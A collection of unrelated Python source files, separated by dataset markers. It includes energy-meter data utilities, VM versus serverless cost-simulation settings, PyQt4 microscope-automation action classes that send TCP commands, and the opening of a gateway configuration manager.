in order to execute in one transaction.
Arguments:
teamleader_results -- list of Tuple[list[teamleader_entry], str].
"""
vars_list = []
for result_tuple in teamleader_results:
tl_type = result_tuple[1]
            # Parse and flatten the SQL values from the teamleader results as
            # a passable list
vars_list.extend(
[
self._prepare_vars_upsert(tl_result, tl_type)
for tl_result
in result_tuple[0]
]
)
self.postgresql_wrapper.executemany(
self.upsert_entities_sql(), vars_list)
# deprecated/unused
# import uuid
# def insert_entity(self, date_time: datetime = datetime.now(), content='{"key": "value"}'):
# vars = (str(uuid.uuid4()), self.name, content)
# self.postgresql_wrapper.execute(self.upsert_entities_sql(), vars)
|
nilq/baby-python
|
python
|
class InvalidBrowserException(Exception):
pass
class InvalidURLException(Exception):
pass
|
nilq/baby-python
|
python
|
import os
import time
import json
import string
import random
import itertools
from datetime import datetime
import numpy as np
import pandas as pd
from numba import jit
from sklearn.metrics import mean_squared_error
from contextlib import contextmanager, redirect_stdout
import matplotlib.pyplot as plt
N_TRAIN = 20216100
N_TEST = 41697600
# load file paths
settings = json.load(open("./settings.json"))
OUTPUT_PATH = settings["OUTPUT_PATH"]
MODEL_PATH = settings["MODEL_PATH"]
DATA_PATH = settings["DATA_PATH"]
PRIMARY_USE_GROUPINGS = [
["Education"],
["Lodging/residential"],
["Office"],
["Entertainment/public assembly"],
["Public services"],
["Other", "Retail", "Parking", "Warehouse/storage",
"Food sales and service", "Religious worship", "Utility", "Technology/science",
"Healthcare", "Manufacturing/industrial", "Services",]
]
def take_first(x): return x.values[0]
def take_last(x): return x.values[-1]
@contextmanager
def timer(name):
print(f'{datetime.now()} - [{name}] ...')
t0 = time.time()
yield
print(f'{datetime.now()} - [{name}] done in {time.time() - t0:.0f} s\n')
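# Example usage of the timer context manager:
#   with timer("load train data"):
#       train = load_data("train_clean")
# prints a start line, runs the block, then reports the elapsed seconds.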
def make_dir(dir_name):
"""Create a directory if it doesn"t already exist"""
if not os.path.exists(dir_name):
os.makedirs(dir_name)
class Logger(object):
"""Save a string line(s) to a file."""
def __init__(self, file_path, mode="w", verbose=False):
self.file_path = file_path
self.verbose = verbose
        open(file_path, mode=mode).close()  # create/truncate the log file up front
def append(self, line, print_line=None):
if print_line or self.verbose:
print(line)
with open(self.file_path, "a") as f:
with redirect_stdout(f):
print(line)
@jit(nopython=True)
def find_zero_streaks(x):
n = len(x)
streaks = np.zeros(n)
if x[0] == 0:
streaks[0] = 1
for i in range(1,n):
if x[i] == 0:
streaks[i] = streaks[i-1] + 1
return streaks
def find_zero_streaks_wrapper(x):
return find_zero_streaks(x.values)
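# Worked example: find_zero_streaks(np.array([0, 0, 3, 0])) returns
# [1., 2., 0., 1.] -- each entry is the length of the run of zeros ending at
# that position, and any non-zero reading resets the streak to 0.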
@jit(nopython=True)
def find_constant_values(x, min_constant_values=6):
i = 0
j = i + 1
n = len(x)
ignore_values = np.zeros(n)
while j < n:
if x[i] == x[j]:
k = j+1
while k < n and x[i] == x[k]:
k += 1
if k-1-i > min_constant_values:
ignore_values[i+1:k] = 1
i = k
else:
i += 1
j = i + 1
return ignore_values==1
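# Worked example: find_constant_values(np.array([5, 5, 5, 5, 1]), min_constant_values=2)
# returns [False, True, True, True, False] -- every element of a long-enough
# constant run except its first occurrence is flagged for exclusion.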
def rmsle(x,y):
x = np.log1p(x)
y = np.log1p(y)
return np.sqrt(mean_squared_error(x, y))
def plot_feature_importance(model, feature_cols):
importance_df = pd.DataFrame(
model.feature_importance(),
index=feature_cols,
columns=['importance']).sort_values('importance')
fig, ax = plt.subplots(figsize=(8, 8))
importance_df.plot.barh(ax=ax)
fig.show()
def get_validation_months(n_months):
validation_months_list = [np.arange(i+1,i+2+n_months-1)
for shift in range(n_months)
for i in range(shift,12+shift, n_months)]
validation_months_list = [(x-1) % 12 + 1 for x in validation_months_list]
return validation_months_list
def reduce_mem_usage(df, skip_cols=[], verbose=False):
""" Reduce memory usage in a pandas dataframe
Based on this great kernel:
https://www.kaggle.com/arjanso/reducing-dataframe-memory-size-by-65
"""
start_mem_usg = df.memory_usage().sum() / 1024**2
print("Memory usage of properties dataframe is :",start_mem_usg," MB")
NAlist = [] # Keeps track of columns that have missing values filled in.
for col in np.setdiff1d(df.columns, skip_cols):
if df[col].dtype != object: # Exclude strings
# print column type
if verbose:
print("******************************")
print("Column: ",col)
print("dtype before: ",df[col].dtype)
# make variables for Int, max and min
IsInt = False
mx = df[col].max()
mn = df[col].min()
if verbose:
print("min for this col: ",mn)
print("max for this col: ",mx)
# Integer does not support NA, therefore, NA needs to be filled
if not np.isfinite(df[col]).all():
NAlist.append(col)
df[col].fillna(mn-1,inplace=True)
# test if column can be converted to an integer
asint = df[col].fillna(0).astype(np.int64)
result = (df[col] - asint)
result = result.sum()
if result > -0.01 and result < 0.01:
IsInt = True
# Make Integer/unsigned Integer datatypes
if IsInt:
if mn >= 0:
if mx < 255:
df[col] = df[col].astype(np.uint8)
elif mx < 65535:
df[col] = df[col].astype(np.uint16)
elif mx < 4294967295:
df[col] = df[col].astype(np.uint32)
else:
df[col] = df[col].astype(np.uint64)
else:
if mn > np.iinfo(np.int8).min and mx < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif mn > np.iinfo(np.int16).min and mx < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif mn > np.iinfo(np.int32).min and mx < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif mn > np.iinfo(np.int64).min and mx < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
# Make float datatypes 32 bit
else:
df[col] = df[col].astype(np.float32)
if verbose:
print("dtype after: ",df[col].dtype)
print("******************************")
# Print final result
if verbose:
print("___MEMORY USAGE AFTER COMPLETION:___")
mem_usg = df.memory_usage().sum() / 1024**2
print("Memory usage is: ",mem_usg," MB")
print("This is ",100*mem_usg/start_mem_usg,"% of the initial size")
return df, NAlist
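# Example usage (the skipped column name is hypothetical):
#   df, filled_na_cols = reduce_mem_usage(df, skip_cols=["timestamp"])
# filled_na_cols lists the columns whose NaNs were filled with (min - 1) so
# that they could be downcast to integer dtypes.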
def load_data(data_name):
"""Loads and formats data"""
# raw
if data_name == "train":
return pd.read_csv(f"{DATA_PATH}/train.csv")
if data_name == "test":
return pd.read_csv(f"{DATA_PATH}/test.csv")
if data_name == "input":
return load_data("train"), load_data("test")
# clean
if data_name == "train_clean":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_clean.pkl")
if data_name == "test_clean":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_clean.pkl")
if data_name == "clean":
return load_data("train_clean"), load_data("test_clean")
# nn meter
if data_name == "train_nn_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_meter.pkl")
if data_name == "test_nn_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_meter.pkl")
if data_name == "nn_meter":
return load_data("train_nn_meter"), load_data("test_nn_meter")
# nn target normalized meter
if data_name == "train_nn_target_normalized_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_target_normalized_meter.pkl")
if data_name == "test_nn_target_normalized_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_target_normalized_meter.pkl")
if data_name == "nn_target_normalized_meter":
return load_data("train_nn_target_normalized_meter"), load_data("test_nn_target_normalized_meter")
# nn site
if data_name == "train_nn_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_site.pkl")
if data_name == "test_nn_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_site.pkl")
if data_name == "nn_site":
return load_data("train_nn_site"), load_data("test_nn_site")
# nn target normalized site
if data_name == "train_nn_target_normalized_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_target_normalized_site.pkl")
if data_name == "test_nn_target_normalized_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_target_normalized_site.pkl")
if data_name == "nn_target_normalized_site":
return load_data("train_nn_target_normalized_site"), load_data("test_nn_target_normalized_site")
# debug 1000
if data_name == "train_clean_debug_1000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_clean_debug_1000.pkl")
if data_name == "test_clean_debug_1000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_clean_debug_1000.pkl")
if data_name == "clean_debug_1000":
return load_data("train_clean_debug_1000"), load_data("test_clean_debug_1000")
if data_name == "leak_debug_1000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/leak_debug_1000.pkl")
# debug 10000
if data_name == "train_clean_debug_10000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_clean_debug_10000.pkl")
if data_name == "test_clean_debug_10000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_clean_debug_10000.pkl")
if data_name == "clean_debug_10000":
return load_data("train_clean_debug_10000"), load_data("test_clean_debug_10000")
if data_name == "leak_debug_10000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/leak_debug_10000.pkl")
# raw weather
if data_name == "train_weather":
return pd.read_csv(f"{DATA_PATH}/weather_train.csv")
if data_name == "test_weather":
return pd.read_csv(f"{DATA_PATH}/weather_test.csv")
if data_name == "weather":
return load_data("train_weather"), load_data("test_weather")
# leak
if data_name == "leak":
return pd.read_feather(f"{DATA_PATH}/leak.feather")
# leak
if data_name == "is_leak":
return pd.read_feather(f"{DATA_PATH}/is_leak.feather")
# rows to drop
if data_name == "bad_meter_readings":
return pd.read_csv(f"{DATA_PATH}/bad_meter_readings.csv")
# meta
if data_name == "meta":
return pd.read_csv(f"{DATA_PATH}/building_metadata.csv")
# submissions
if data_name == "sample_submission":
return pd.read_csv(f"{DATA_PATH}/sample_submission.csv")
# meta
if data_name == "best_submission":
return pd.read_csv(f"{DATA_PATH}/submissions/final_average_top4.csv")
|
nilq/baby-python
|
python
|
"""
Configurations for Reserved, On-demand and Serverless Virtual Machine simulations:
"""
###################################
### Don't touch this line - import
import numpy
###################################
################################################
### General configurations, for all simulations
START_TIME = 0 # Seconds - NOT IMPLEMENTED -> To simulate starting the experiment at a specific hour
SIMULATION_TIME = 86400 # Total simulation time (in seconds)
#AVERAGE_SERVICE_TIME = 0.008
AVERAGE_SERVICE_TIME = 0.3
#MAX_AVERAGE_LATENCY = 0.33 #Expected response time for the request from client's perspective (in seconds)
MAX_AVERAGE_LATENCY = 60
#####SYNTHETIC RATE FOR EXPERIMENTS
#ARRIVAL_RATE = numpy.array([
#4,5,6,5,4,3,2,1.6,1.4,1.3,1.2,1.1,1,1,1.1,1.1,1.2,1.4,1.6,1.7,1.8,1.9,2,3
#])
#### REAL REQUEST RATE FROM DATIL
ARRIVAL_RATE = numpy.array([
4.745364, 6.063600, 7.923774, 10.608352, 14.594335, 20.014631, 26.161790, 28.412080, 30.432822, 30.187835,
20.620131, 12.936782, 5.346152, 1.807029, 2.229556, 3.186768, 3.543904, 4.126800,
4.330005, 3.319482, 3.371923, 3.806141, 3.396690, 4.052290
])
################################################
### Configurations for Reserved VMs simulations
MAX_CONCURRENT_REQUESTS_PER_VM = 2
VM_HOURLY_COST_RESERVED = 0.034 #Per VM hourly cost in USD
################################################
### Configurations for On-demand VMs simulations
MAX_CONCURRENT_REQUESTS_PER_VM = 2
VM_HOURLY_COST_ONDEMAND = 0.047 #Per VM hourly cost in USD
################################################
### Configurations for Serverless simulations
TIME_TO_SETUP_FUNCTION = 1.4
COST_PER_REQUEST = 0.0000002
FUNCTION_MEMORY = 128 #Compression function requires 15MB, but the minimal for billing is 128MB
COST_PER_EXECUTION = 0.00001667 #Compression function requires 0.008 secs, but usage is rounded to nearest 100m for billing.
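# Quick cost sanity check (plain arithmetic on the constants above): one
# reserved VM costs 0.034 * 24 = 0.816 USD per simulated day, while an
# on-demand VM costs 0.047 * 24 = 1.128 USD per day.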
|
nilq/baby-python
|
python
|
#!/usr/bin/python
#
## @file
#
# Collection of classes that control the establish the basic operation of dave
# as it issues various types of commands to HAL and Kilroy
#
# Jeff 3/14
#
# Hazen 09/14
#
from xml.etree import ElementTree
from PyQt4 import QtCore
import sc_library.tcpMessage as tcpMessage
## addField
#
# @param block A ElementTree node.
# @param name The name of the field as a string.
# @param value The value of the field.
#
def addField(block, name, value):
field = ElementTree.SubElement(block, name)
field.set("type", str(type(value).__name__))
field.text = str(value)
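# For example, addField(block, "stage_x", 10.0) appends a child element that
# serializes as: <stage_x type="float">10.0</stage_x>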
## DaveAction
#
# The base class for a dave action (DA for short).
#
class DaveAction(QtCore.QObject):
# Define custom signal
complete_signal = QtCore.pyqtSignal(object)
error_signal = QtCore.pyqtSignal(object)
## __init__
#
# Default initialization.
#
def __init__(self):
# Initialize parent class
QtCore.QObject.__init__(self, None)
self.action_type = "NA"
self.disk_usage = 0
self.duration = 0
self.tcp_client = None
self.message = None
self.valid = True
# Define pause behaviors
self.should_pause = False # Pause after completion
self.should_pause_after_error = True # Pause after error
# Initialize internal timer
self.lost_message_timer = QtCore.QTimer(self)
self.lost_message_timer.setSingleShot(True)
self.lost_message_timer.timeout.connect(self.handleTimerDone)
self.lost_message_delay = 2000 # Wait for a test message to be returned before issuing an error
## abort
#
# Handle an external abort call
#
def abort(self):
self.completeAction(self.message)
## cleanUp
#
# Handle clean up of the action
#
def cleanUp(self):
self.tcp_client.messageReceived.disconnect()
## createETree
#
    # Takes a dictionary that may (or may not) contain the information that
    # is necessary to create the Action. If the information is not present
    # then None is returned. If the information is present then an ElementTree
    # is returned containing the information necessary to create the Action.
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
pass
## completeAction
#
# Handle the completion of an action
#
# @param message A TCP message object
#
def completeAction(self, message):
if message.isTest():
time = message.getResponse("duration")
if time is not None: self.duration = time
space = message.getResponse("disk_usage")
if space is not None: self.disk_usage = space
self.complete_signal.emit(message)
## completeActionWithError
#
# Send an error message if needed
#
# @param message A TCP message object
#
def completeActionWithError(self, message):
if (self.should_pause_after_error == True):
self.should_pause = True
self.error_signal.emit(message)
## getActionType
#
# @return The type of the action (i.e. "hal", "kilroy", ..)
#
def getActionType(self):
return self.action_type
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return type(self).__name__[2:]
## getDuration
#
# @return Duration (in seconds?)
#
def getDuration(self):
return self.duration
## getLongDescriptor
#
# @return A N x 2 array containing the message data.
#
def getLongDescriptor(self):
if self.message is not None:
mdict = self.message.getMessageData()
data = []
for key in sorted(mdict):
data.append([key, mdict[key]])
return data
else:
return [None,None]
## getUsage
#
# @return Disk usage.
#
def getUsage(self):
return self.disk_usage
## handleReply
#
# handle the return of a message
#
# @param message A TCP message object
#
def handleReply(self, message):
# Stop lost message timer
self.lost_message_timer.stop()
# Check to see if the same message got returned
if not (message.getID() == self.message.getID()):
message.setError(True, "Communication Error: Incorrect Message Returned")
self.completeActionWithError(message)
elif message.hasError():
self.completeActionWithError(message)
else: # Correct message and no error
self.completeAction(message)
## handleTimerDone
#
# Handle a timer done signal
#
def handleTimerDone(self):
error_str = "A message of type " + self.message.getType() + " was never received.\n"
error_str += "Perhaps a module is missing?"
self.message.setError(True, error_str)
self.completeActionWithError(self.message)
## isValid
#
# @return True/False is the command is valid.
#
def isValid(self):
return self.valid
## setProperty
#
# Set object property, throw an error if the property is not recognized.
#
def setProperty(self, pname, pvalue):
if pname in self.properties.keys():
self.properties[pname] = pvalue
else:
raise Exception(pname + " is not a valid property for " + str(type(self)))
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
pass
## setValid
#
# @param is_valid True/False is this message is valid.
#
def setValid(self, is_valid):
self.valid = is_valid
## shouldPause
#
# Determine if the command engine should pause after this action
#
# @return A boolean determining if the program pauses after this action is complete
def shouldPause(self):
return self.should_pause
## start
#
# Start the action.
#
# @param tcp_client The TCP client to use for communication.
# @param test_mode Send the command in test mode.
#
def start(self, tcp_client, test_mode):
self.tcp_client = tcp_client
self.message.setTestMode(test_mode)
self.tcp_client.messageReceived.connect(self.handleReply)
if self.message.isTest():
self.lost_message_timer.start(self.lost_message_delay)
self.tcp_client.sendMessage(self.message)
#
# Specific Actions
#
## DADelay
#
# This action introduces a defined delay.
#
class DADelay(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
## abort
#
# Handle an external abort call
#
def abort(self):
self.delay_timer.stop()
self.completeAction(self.message)
## cleanUp
#
# Handle clean up of the action
#
def cleanUp(self):
pass
## createETree
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
delay = dictionary.get("delay")
if delay is not None:
block = ElementTree.Element(str(type(self).__name__))
addField(block, "delay", delay)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "pause for " + str(self.delay) + "ms"
## handleTimerComplete
#
    # Handle completion of the delay timer
#
def handleTimerComplete(self):
self.completeAction(self.message)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
# Prepare delay timer
self.delay_timer = QtCore.QTimer(self)
self.delay_timer.setSingleShot(True)
self.delay_timer.timeout.connect(self.handleTimerComplete)
self.delay = int(node.find("delay").text)
# Create message and add delay time for accurate dave time estimates
self.message = tcpMessage.TCPMessage(message_type = "Delay",
                                             message_data = {"delay": self.delay})
self.message.addResponse("duration", self.delay)
## start
#
# Start the action.
#
# @param dummy Ignored.
# @param test_mode Send the command in test mode.
#
def start(self, dummy, test_mode):
self.message.setTestMode(test_mode)
if self.message.isTest():
self.completeAction(self.message)
else:
self.delay_timer.start(self.delay)
print "Delaying " + str(self.delay) + " ms"
## DAFindSum
#
# The find sum action.
#
class DAFindSum(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
    # @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
find_sum = dictionary.get("find_sum")
if find_sum is None:
return
if (find_sum > 0.0):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "min_sum", find_sum)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "find sum (minimum sum = " + str(self.min_sum) + ")"
## handleReply
#
    # Override of default handleReply to allow comparison of min_sum
#
# @param message A TCP message object
#
def handleReply(self, message):
found_sum = message.getResponse("found_sum")
        if (found_sum is not None) and (found_sum <= self.min_sum):
            message.setError(True, "Found sum " + str(found_sum) + " does not exceed minimum sum " + str(self.min_sum))
DaveAction.handleReply(self, message)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.min_sum = float(node.find("min_sum").text)
self.message = tcpMessage.TCPMessage(message_type = "Find Sum",
message_data = {"min_sum": self.min_sum})
## DAMoveStage
#
# The move stage action.
#
class DAMoveStage(DaveAction):
## __init__
#
# @param tcp_client A tcp communications object.
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
    # @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
stage_x = dictionary.get("stage_x")
stage_y = dictionary.get("stage_y")
if (stage_x is not None) and (stage_y is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "stage_x", stage_x)
addField(block, "stage_y", stage_y)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "move stage to " + str(self.stage_x) + ", " + str(self.stage_y)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.stage_x = float(node.find("stage_x").text)
self.stage_y = float(node.find("stage_y").text)
self.message = tcpMessage.TCPMessage(message_type = "Move Stage",
message_data = {"stage_x" : self.stage_x,
"stage_y" : self.stage_y})
## DAPause
#
# This action causes Dave to pause.
#
class DAPause(DaveAction):
## __init__
#
# @param tcp_client A tcp communications object.
#
def __init__(self):
DaveAction.__init__(self)
## cleanUp
#
# Handle clean up of the action
#
def cleanUp(self):
pass
## createETree
#
    # @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
pause = dictionary.get("pause")
if (pause is not None):
block = ElementTree.Element(str(type(self).__name__))
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "pause"
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
# Create message and add delay time for accurate dave time estimates
self.message = tcpMessage.TCPMessage(message_type = "Pause");
# Define pause behaviors
self.should_pause = True
## start
#
# Start the action.
#
# @param dummy Ignored.
# @param test_mode Send the command in test mode.
#
def start(self, dummy, test_mode):
        self.message.setTestMode(test_mode)
        # Test and normal mode behave identically here: the action completes
        # immediately, and the actual pause is handled by the command engine
        # via should_pause.
        self.completeAction(self.message)
## DARecenterPiezo
#
# The piezo recentering action. Note that this is only useful if the microscope
# has a motorized Z.
#
class DARecenterPiezo(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
recenter = dictionary.get("recenter")
if (recenter is not None):
block = ElementTree.Element(str(type(self).__name__))
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "recenter piezo"
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.message = tcpMessage.TCPMessage(message_type = "Recenter Piezo")
## DASetDirectory
#
# Change the Hal Directory.
#
class DASetDirectory(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
directory = dictionary.get("directory")
if (directory is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "directory", directory)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "change directory to " + self.directory
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.directory = node.find("directory").text
self.message = tcpMessage.TCPMessage(message_type = "Set Directory",
message_data = {"directory": self.directory})
## DASetFocusLockTarget
#
# The set focus lock target action.
#
class DASetFocusLockTarget(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
lock_target = dictionary.get("lock_target")
if (lock_target is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "lock_target", lock_target)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "set focus lock target to " + str(self.lock_target)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.lock_target = float(node.find("lock_target").text)
self.message = tcpMessage.TCPMessage(message_type = "Set Lock Target",
message_data = {"lock_target" : self.lock_target})
## DASetParameters
#
# The action responsible for setting the movie parameters in Hal.
#
class DASetParameters(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
parameters = dictionary.get("parameters")
if (parameters is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "parameters", parameters)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "set parameters to " + str(self.parameters)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
p_node = node.find("parameters")
if (p_node.attrib["type"] == "int"):
self.parameters = int(node.find("parameters").text)
else:
self.parameters = node.find("parameters").text
self.message = tcpMessage.TCPMessage(message_type = "Set Parameters",
message_data = {"parameters" : self.parameters})
## DASetProgression
#
# The action responsible for setting the illumination progression.
#
class DASetProgression(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
progression = dictionary.get("progression")
if progression is not None:
block = ElementTree.Element(str(type(self).__name__))
for pnode in progression:
# The round trip fixes some white space issues.
block.append(ElementTree.fromstring(ElementTree.tostring(pnode)))
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "set progressions to " + self.type
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.type = node.find("type").text
message_data = {"type" : self.type}
# File progression.
if node.find("filename") is not None:
message_data["filename"] = node.find("filename").text
# Math progression.
elif node.find("channel") is not None:
channels = []
for ch_node in [x for x in node if (x.tag == "channel")]:
channel = int(ch_node.text)
start = float(ch_node.attrib["start"])
if "frames" in ch_node.attrib:
frames = int(ch_node.attrib["frames"])
else:
frames = 100
if "inc" in ch_node.attrib:
inc = float(ch_node.attrib["inc"])
else:
inc = 0.0
channels.append([channel, start, frames, inc])
message_data["channels"] = channels
self.message = tcpMessage.TCPMessage(message_type = "Set Progression",
message_data = message_data)
## DATakeMovie
#
# Send a take movie command to Hal
#
class DATakeMovie(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
self.properties = {"name" : None,
"length" : None,
"min_spots" : None,
"parameters" : None,
"directory" : None,
"overwrite" : None}
## abort
#
# Send an abort message to Hal
#
def abort(self):
stop_message = tcpMessage.TCPMessage(message_type = "Abort Movie")
self.tcp_client.sendMessage(stop_message)
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
name = dictionary.get("name")
length = dictionary.get("length")
min_spots = dictionary.get("min_spots")
parameters = dictionary.get("parameters")
directory = dictionary.get("directory")
overwrite = dictionary.get("overwrite")
if (name is not None) and (length is not None):
if (length > 0):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "name", name)
addField(block, "length", length)
if min_spots is not None:
addField(block, "min_spots", min_spots)
if parameters is not None:
addField(block, "parameters", parameters)
if directory is not None:
addField(block, "directory", directory)
if overwrite is not None:
addField(block, "overwrite", overwrite)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
if (self.min_spots > 0):
return "take movie " + self.name + ", " + str(self.length) + " frames, " + str(self.min_spots) + " minimum spots"
else:
return "take movie " + self.name + ", " + str(self.length) + " frames"
## handleReply
#
    # Override of default handleReply to allow comparison of min_spots
#
# @param message A TCP message object
#
def handleReply(self, message):
found_spots = message.getResponse("found_spots")
        if (found_spots is not None) and (found_spots < self.min_spots):
            err_str = str(found_spots) + " found molecules is less than the target: "
            err_str += str(self.min_spots)
            message.setError(True, err_str)
        DaveAction.handleReply(self, message)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.name = node.find("name").text
self.length = int(node.find("length").text)
self.min_spots = 0
if node.find("min_spots") is not None:
self.min_spots = int(node.find("min_spots").text)
message_data = {"name" : self.name,
"length" : self.length,
"min_spots" : self.min_spots,
"parameters" : None}
if node.find("parameters") is not None:
message_data["parameters"] = node.find("parameters").text
if node.find("directory") is not None:
message_data["directory"] = node.find("directory").text
if node.find("overwrite") is not None:
message_data["overwrite"] = node.find("overwrite").text
self.message = tcpMessage.TCPMessage(message_type = "Take Movie",
message_data = message_data)
## DAValveProtocol
#
# The fluidics protocol action. Send commands to Kilroy.
#
class DAValveProtocol(DaveAction):
## __init__
#
# Initialize the valve protocol action
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "kilroy"
self.properties = {"name" : None}
## createETree
#
# Generate a Element Tree for the valve protocol specified.
#
# @param dictionary A dictionary containing the relevant data to create the element tree
#
def createETree(self, dictionary):
name = dictionary.get("name", None)
if (name is not None):
node = ElementTree.Element(str(type(self).__name__))
node.text = name
return node
else:
return None
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "valve protocol " + self.protocol_name
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.protocol_name = node.text
self.protocol_is_running = False
self.message = tcpMessage.TCPMessage(message_type = "Kilroy Protocol",
message_data = {"name": self.protocol_name})
#
# The MIT License
#
# Copyright (c) 2014 Zhuang Lab, Harvard University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
|
nilq/baby-python
|
python
|
"""
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import asyncio
import logging
from typing import Any, List
from magma.common.service import MagmaService
from magma.common.streamer import StreamerClient
from magma.configuration.mconfig_managers import MconfigManager, \
load_service_mconfig
from magma.magmad.service_manager import ServiceManager
from orc8r.protos.mconfig import mconfigs_pb2
from orc8r.protos.mconfig_pb2 import GatewayConfigsDigest
CONFIG_STREAM_NAME = 'configs'
class ConfigManager(StreamerClient.Callback):
"""
Manager for access gateway config. Updates are received as a stream and
are guaranteed to be lossless and in-order. Config is written to file in
JSON format.
"""
